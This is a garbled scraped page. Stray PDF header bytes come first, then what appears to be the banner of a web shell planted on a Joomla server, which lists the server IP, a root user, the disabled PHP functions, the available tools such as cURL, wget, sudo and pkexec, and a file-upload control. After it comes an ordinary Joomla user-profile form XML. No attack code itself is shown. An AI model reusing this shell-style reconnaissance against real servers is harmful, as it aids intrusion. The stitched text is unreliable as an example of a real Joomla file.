%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/components/com_users/models/forms/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?> <form> <fieldset name="core" label="COM_USERS_PROFILE_DEFAULT_LABEL"> <field name="id" type="hidden" filter="integer" /> <field name="name" type="text" description="COM_USERS_PROFILE_NAME_DESC" filter="string" label="COM_USERS_PROFILE_NAME_LABEL" required="true" size="30" /> <field name="username" type="text" class="validate-username" description="COM_USERS_DESIRED_USERNAME" filter="username" label="COM_USERS_PROFILE_USERNAME_LABEL" message="COM_USERS_PROFILE_USERNAME_MESSAGE" required="true" size="30" validate="username" /> <field name="password1" type="password" autocomplete="off" class="validate-password" description="COM_USERS_DESIRED_PASSWORD" filter="raw" label="COM_USERS_PROFILE_PASSWORD1_LABEL" size="30" validate="password" /> <field name="password2" type="password" autocomplete="off" class="validate-password" description="COM_USERS_PROFILE_PASSWORD2_DESC" field="password1" filter="raw" label="COM_USERS_PROFILE_PASSWORD2_LABEL" message="COM_USERS_PROFILE_PASSWORD1_MESSAGE" size="30" validate="equals" /> <field name="email1" type="email" description="COM_USERS_PROFILE_EMAIL1_DESC" filter="string" label="COM_USERS_PROFILE_EMAIL1_LABEL" message="COM_USERS_PROFILE_EMAIL1_MESSAGE" required="true" size="30" unique="true" validate="email" /> <field name="email2" type="email" description="COM_USERS_PROFILE_EMAIL2_DESC" field="email1" filter="string" label="COM_USERS_PROFILE_EMAIL2_LABEL" message="COM_USERS_PROFILE_EMAIL2_MESSAGE" required="true" size="30" validate="equals" /> </fieldset> <!-- Used to get the two factor authentication configuration --> <field name="twofactor" type="hidden" /> </form>